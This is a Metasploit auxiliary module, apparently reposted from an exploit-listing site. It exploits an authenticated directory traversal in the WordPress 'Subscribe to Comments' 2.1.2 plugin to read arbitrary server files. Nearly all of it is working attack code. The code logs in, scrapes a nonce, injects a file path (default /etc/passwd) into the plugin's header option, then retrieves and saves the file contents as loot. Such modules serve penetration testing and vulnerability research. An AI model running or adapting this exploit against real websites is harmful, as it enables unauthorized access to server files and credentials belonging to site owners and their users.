Share
## https://sploitus.com/exploit?id=PACKETSTORM:181141
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Auxiliary::Report  
include Msf::Exploit::Remote::HTTP::Wordpress  
include Msf::Auxiliary::Scanner  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'WordPress Subscribe Comments File Read Vulnerability',  
'Description' => %q{  
This module exploits an authenticated directory traversal vulnerability  
in WordPress Plugin "Subscribe to Comments" version 2.1.2, allowing  
to read arbitrary files with the web server privileges.  
},  
'References' =>  
[  
['WPVDB', '8102'],  
['PACKETSTORM', '132694'],  
['URL', 'https://advisories.dxw.com/advisories/admin-only-local-file-inclusion-and-arbitrary-code-execution-in-subscribe-to-comments-2-1-2/']  
],  
'Author' =>  
[  
'Tom Adams <security[at]dxw.com>', # Vulnerability Discovery  
'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module  
],  
'License' => MSF_LICENSE  
))  
  
register_options(  
[  
OptString.new('WP_USER', [true, 'A valid username', nil]),  
OptString.new('WP_PASS', [true, 'Valid password for the provided username', nil]),  
OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd'])  
])  
end  
  
def user  
datastore['WP_USER']  
end  
  
def password  
datastore['WP_PASS']  
end  
  
def check  
check_plugin_version_from_readme('subscribe-to-comments', '2.3')  
end  
  
def get_nonce(cookie)  
res = send_request_cgi(  
'uri' => normalize_uri(wordpress_url_backend, 'options-general.php'),  
'method' => 'GET',  
'vars_get' => {  
'page' => 'stc-options'  
},  
'cookie' => cookie  
)  
  
if res && res.redirect? && res.redirection  
location = res.redirection  
print_status("Following redirect to #{location}")  
res = send_request_cgi(  
'uri' => location,  
'method' => 'GET',  
'cookie' => cookie  
)  
end  
  
if res && res.body && res.body =~ /id="_wpnonce" name="_wpnonce" value="([a-z0-9]+)" /  
return Regexp.last_match[1]  
end  
nil  
end  
  
def down_file(cookie, nonce)  
filename = datastore['FILEPATH']  
filename = filename[1, filename.length] if filename =~ %r{/^///}  
  
res = send_request_cgi(  
'method' => 'POST',  
'uri' => normalize_uri(wordpress_url_backend, 'options-general.php'),  
'vars_get' => {  
'page' => 'stc-options'  
},  
'vars_post' => {  
'sg_subscribe_settings[name]' => '',  
'sg_subscribe_settings[email]' => '',  
'sg_subscribe_settings[clear_both]' => 'clear_both',  
'sg_subscribe_settings[not_subscribed_text]' => 'teste',  
'sg_subscribe_settings[subscribed_text]' => 'teste',  
'sg_subscribe_settings[author_text]' => '',  
'sg_subscribe_settings[use_custom_style]' => 'use_custom_style',  
'sg_subscribe_settings[header]' => "#{filename}",  
'sg_subscribe_settings[sidebar]' => '',  
'sg_subscribe_settings[footer]' => '',  
'sg_subscribe_settings[before_manager]' => '',  
'sg_subscribe_settings[after_manager]' => '',  
'sg_subscribe_settings_submit' => 'Update Options',  
'_wpnonce' => "#{nonce}",  
'_wp_http_referer' => '/wp-admin/options-general.php?page=stc-options'  
},  
'cookie' => cookie  
)  
  
if res && res.code == 200 && res.body.include?("<p><strong>Options saved.</strong>")  
return res.body  
end  
nil  
end  
  
def run_host(ip)  
vprint_status("Trying to login as: #{user}")  
cookie = wordpress_login(user, password)  
if cookie.nil?  
print_error("Unable to login as: #{user}")  
return  
end  
store_valid_credential(user: user, private: password, proof: cookie)  
  
vprint_status("Trying to get nonce...")  
nonce = get_nonce(cookie)  
if nonce.nil?  
print_error("Can not get nonce after login")  
return  
end  
vprint_status("Got nonce: #{nonce}")  
  
vprint_status("Trying to download filepath.")  
file_path = down_file(cookie, nonce)  
if file_path.nil?  
print_error("Error downloading filepath.")  
return  
end  
  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path),  
'vars_get' => {  
'wp-subscription-manager' => '1'  
},  
'cookie' => cookie  
)  
  
if res && res.code == 200 &&  
res.body.length > 830 &&  
res.body.include?(">Find Subscriptions</") &&  
res.headers['Content-Length'].to_i > 830  
  
res_clean = res.body.gsub(/\t/, '').gsub(/\r\n/, '').gsub(/<.*$/, "")  
  
vprint_line("\n#{res_clean}")  
fname = datastore['FILEPATH']  
path = store_loot(  
'subscribecomments.traversal',  
'text/plain',  
ip,  
res_clean,  
fname  
)  
  
print_good("File saved in: #{path}")  
else  
print_error("Nothing was downloaded. You can try to change the FILEPATH.")  
end  
end  
end